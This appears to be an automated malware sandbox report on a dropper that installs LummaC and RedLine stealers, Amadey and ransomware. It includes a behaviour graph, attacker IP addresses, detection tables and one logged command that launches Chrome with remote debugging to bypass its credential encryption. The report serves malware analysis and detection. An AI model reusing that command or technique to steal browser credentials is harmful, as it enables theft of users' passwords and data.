                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAH
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHA
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFW
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOH
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeDirectory queried: C:\Users\user\Documents
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJ
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeDirectory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeDirectory queried: number of queries: 1001
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeDirectory queried: number of queries: 1001
                    Source: Yara matchFile source: 0000001B.00000003.2816284787.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.2825365325.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000003.2788989135.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000003.2838159994.00000000014C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000003.2814761965.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.2190479666.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000003.2695177861.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2492014049.00000000027CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 7620ab885d.exe PID: 2456, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 8469cb4d4d.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DJj.exe PID: 3500, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: b285303eae.exe PID: 7044, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: b9ba85c997.exe PID: 4164, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Attempt to bypass Chrome Application-Bound Encryption
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: Process Memory Space: 7620ab885d.exe PID: 2456, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 8469cb4d4d.exe PID: 7060, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: b285303eae.exe PID: 7044, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: b9ba85c997.exe PID: 4164, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c130c124d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c1310fe590.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c1310d6568.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c1310fe590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c1310d6568.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.0.DJj.exe.1b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.2343778793.000001C13114E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2343778793.000001C1310D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.2343637701.000001C130C03000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000000.2340764340.00000000001B2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 0a7e8af92e.exe PID: 632, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DJj.exe PID: 3500, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		411
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		2
                    Scheduled Task/Job                    		2
                    Bypass User Account Control                    		21
                    Deobfuscate/Decode Files or Information                    		LSASS Memory22
                    File and Directory Discovery                    		Remote Desktop Protocol41
                    Data from Local System                    		2
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter                    		11
                    Registry Run Keys / Startup Folder                    		1
                    Extra Window Memory Injection                    		4
                    Obfuscated Files or Information                    		Security Account Manager347
                    System Information Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Remote Access Software                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Scheduled Task/Job                    		Login Hook112
                    Process Injection                    		12
                    Software Packing                    		NTDS1
                    Query Registry                    		Distributed Component Object ModelInput Capture1
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell                    		Network Logon Script2
                    Scheduled Task/Job                    		1
                    Timestomp                    		LSA Secrets1181
                    Security Software Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                    Registry Run Keys / Startup Folder                    		1
                    DLL Side-Loading                    		Cached Domain Credentials3
                    Process Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Bypass User Account Control                    		DCSync681
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    File Deletion                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Extra Window Memory Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron113
                    Masquerading                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd681
                    Virtualization/Sandbox Evasion                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task112
                    Process Injection                    		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580355 Sample: cMTqzvmx9u.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 140 Found malware configuration 2->140 142 Malicious sample detected (through community Yara rule) 2->142 144 Antivirus detection for dropped file 2->144 146 15 other signatures 2->146 8 skotes.exe 4 67 2->8         started        13 cMTqzvmx9u.exe 5 2->13         started        15 skotes.exe 2->15         started        17 4 other processes 2->17 process3 dnsIp4 130 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 8->130 132 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 8->132 134 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 8->134 88 C:\Users\user\AppData\...\aa8c9de034.exe, PE32+ 8->88 dropped 90 C:\Users\user\AppData\...\f53b3c5fe2.exe, PE32 8->90 dropped 92 C:\Users\user\AppData\...\91732ff836.exe, PE32 8->92 dropped 98 27 other malicious files 8->98 dropped 184 Creates multiple autostart registry keys 8->184 186 Hides threads from debuggers 8->186 188 Tries to detect sandboxes / dynamic malware analysis system (registry check) 8->188 19 e6e4c20fad.exe 8->19         started        24 0a7e8af92e.exe 8->24         started        26 b9ba85c997.exe 8->26         started        32 8 other processes 8->32 94 C:\Users\user\AppData\Local\...\skotes.exe, PE32 13->94 dropped 96 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 13->96 dropped 190 Detected unpacking (changes PE section rights) 13->190 192 Tries to evade debugger and weak emulator (self modifying code) 13->192 194 Tries to detect virtualization through RDTSC time measurements 13->194 28 skotes.exe 13->28         started        196 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->196 136 23.218.208.109 AS6453US United States 17->136 138 127.0.0.1 unknown unknown 17->138 198 Creates files in the system32 config directory 17->198 200 Tries to harvest and steal browser information (history, passwords, etc) 17->200 30 firefox.exe 17->30         started        file5 signatures6 process7 dnsIp8 110 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 19->110 70 C:\Users\user\AppData\...\softokn3[1].dll, PE32 19->70 dropped 72 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 19->72 dropped 86 10 other files (6 malicious) 19->86 dropped 148 Attempt to bypass Chrome Application-Bound Encryption 19->148 168 6 other signatures 19->168 34 chrome.exe 19->34         started        74 C:\Users\user\AppData\Roaming\...\DJj.exe, PE32 24->74 dropped 150 Multi AV Scanner detection for dropped file 24->150 152 Suspicious powershell command line found 24->152 154 Encrypted powershell cmdline option found 24->154 37 DJj.exe 24->37         started        40 powershell.exe 24->40         started        76 C:\Users\user\...\MZHUJDVAZFQBUC9CQYK.exe, PE32 26->76 dropped 78 C:\Users\...8X4KAZW48ZU3YY0Y4JPME949S3Q.exe, PE32 26->78 dropped 156 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->156 158 Query firmware table information (likely to detect VMs) 26->158 160 Tries to evade debugger and weak emulator (self modifying code) 26->160 162 Detected unpacking (changes PE section rights) 28->162 170 2 other signatures 28->170 112 18.66.161.98 MIT-GATEWAYSUS United States 30->112 114 142.250.181.110 GOOGLEUS United States 30->114 120 13 other IPs or domains 30->120 80 C:\Users\user\AppData\...\gmpopenh264.dll.tmp, PE32+ 30->80 dropped 82 C:\Users\user\...\gmpopenh264.dll (copy), PE32+ 30->82 dropped 42 firefox.exe 30->42         started        116 149.154.167.220 TELEGRAMRU United Kingdom 32->116 118 142.250.181.1 GOOGLEUS United States 32->118 122 8 other IPs or domains 32->122 84 C:\Program Files\...\graph.exe, PE32+ 32->84 dropped 164 Binary is likely a compiled AutoIt script file 32->164 166 Tries to detect sandboxes and other dynamic analysis tools (window names) 32->166 172 9 other signatures 32->172 44 WerFault.exe 32->44         started        47 7ddd2a748c.exe 32->47         started        49 taskkill.exe 32->49         started        51 7 other processes 32->51 file9 signatures10 process11 dnsIp12 102 239.255.255.250 unknown Reserved 34->102 53 chrome.exe 34->53         started        104 147.45.44.224 FREE-NET-ASFREEnetEU Russian Federation 37->104 174 Multi AV Scanner detection for dropped file 37->174 176 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 37->176 178 Found many strings related to Crypto-Wallets (likely being stolen) 37->178 182 3 other signatures 37->182 180 Loading BitLocker PowerShell Module 40->180 56 conhost.exe 40->56         started        58 WmiPrvSE.exe 40->58         started        106 104.208.16.94 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 44->106 100 C:\ProgramData\Microsoft\...\Report.wer, Unicode 44->100 dropped 108 172.67.209.202 CLOUDFLARENETUS United States 47->108 60 conhost.exe 49->60         started        62 conhost.exe 51->62         started        64 conhost.exe 51->64         started        66 conhost.exe 51->66         started        68 conhost.exe 51->68         started        file13 signatures14 process15 dnsIp16 124 142.250.181.68 GOOGLEUS United States 53->124 126 172.217.19.227 GOOGLEUS United States 53->126 128 3 other IPs or domains 53->128

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    cMTqzvmx9u.exe50%ReversingLabsWin32.Infostealer.Tinba
                    cMTqzvmx9u.exe100%AviraTR/Crypt.TPM.Gen
                    cMTqzvmx9u.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exe100%AviraHEUR/AGEN.1320706
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe100%AviraTR/ATRAPS.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe100%AviraTR/Crypt.XPACK.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[3].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe100%Joe Sandbox ML
                    C:\Program Files\Windows Media Player\graph\graph.exe0%ReversingLabs
                    C:\ProgramData\freebl3.dll0%ReversingLabs
                    C:\ProgramData\mozglue.dll0%ReversingLabs
                    C:\ProgramData\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\nss3.dll0%ReversingLabs
                    C:\ProgramData\softokn3.dll0%ReversingLabs
                    C:\ProgramData\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe74%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe30%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe78%ReversingLabsWin32.Trojan.LummaStealer
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exe58%ReversingLabsWin32.Trojan.LummaStealer
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe52%ReversingLabsWin64.Trojan.RedLineSteal
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[2].exe63%ReversingLabsWin32.Ransomware.Generic
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[4].exe87%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe78%ReversingLabsWin32.Trojan.LummaStealer
                    C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe52%ReversingLabsWin64.Trojan.RedLineSteal
                    C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe30%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe58%ReversingLabsWin32.Trojan.LummaStealer
                    C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe63%ReversingLabsWin32.Ransomware.Generic
                    C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe74%ReversingLabsWin32.Trojan.Generic
                    C:\Users\user\AppData\Local\Temp\1021720001\91732ff836.exe87%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\AppData\Local\Temp\1021721001\f53b3c5fe2.exe78%ReversingLabsWin32.Trojan.LummaStealer
                    C:\Users\user\AppData\Local\Temp\1021722001\aa8c9de034.exe63%ReversingLabsWin32.Ransomware.Generic
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe50%ReversingLabsWin32.Infostealer.Tinba
                    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp0%ReversingLabs
                    C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe88%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

